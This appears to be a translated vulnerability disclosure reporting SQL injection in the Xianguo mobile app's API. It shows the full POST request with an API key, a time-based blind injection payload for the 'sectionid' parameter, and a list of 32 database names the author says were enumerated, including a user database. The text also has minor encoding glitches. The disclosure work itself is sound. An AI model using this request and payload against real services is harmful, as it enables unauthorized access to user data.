The official APP of xiaguo network has SQL injection (Cross 32 databases/including a large number of user libraries)
SQL Injection for APP security
Objective: To view the official APP of xiaguo Network
SQL Injection exists in the following areas: (sectionid in POST, time blind injection)
POST http://api.xianguo.com/i/status/get.json?key=36d979af3f6cecd87b89720d3284d420 HTTP/1.1Accept-Encoding: gzip, deflateAccept-Charset: UTF-8User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; ZTE Grand S MIUI/V5)Host: api.xianguo.comConnection: Keep-AliveContent-Type: application/x-www-form-urlencodedContent-Length: 335devicemodel=TEST&count=1&isThumb=1&sinceid=1452294473§ionid=186&devicetype=5&isShowContent=1&udid=A0000000000000§iontype=31&version=77&
Payload:
sectionid=if(1=1,BENCHMARK(3000000,ENCODE('HELLO','GOODBYE')),0)
I don't know why SQLMAP didn't run, so I wrote a PYTHON
1. List current database users
2. List the current database
3. list all databases, 32 in total. In addition, we found that the user database should contain a large amount of user data, which is not detailed.
analyticbangbook_newbook_novelbooksclientdigital_marketfeedgdcncgroupsigoliinformation_schemalife_streamlife_stream_doingslife_stream_doings_metalife_stream_followlife_stream_linklife_stream_publiclinemetadatamysqlnovel_spiderpartnerrecommendremarksamsungshort_urlsnslogspidertaggrouptestuserwordpress
Solution:
Please kindly advise ~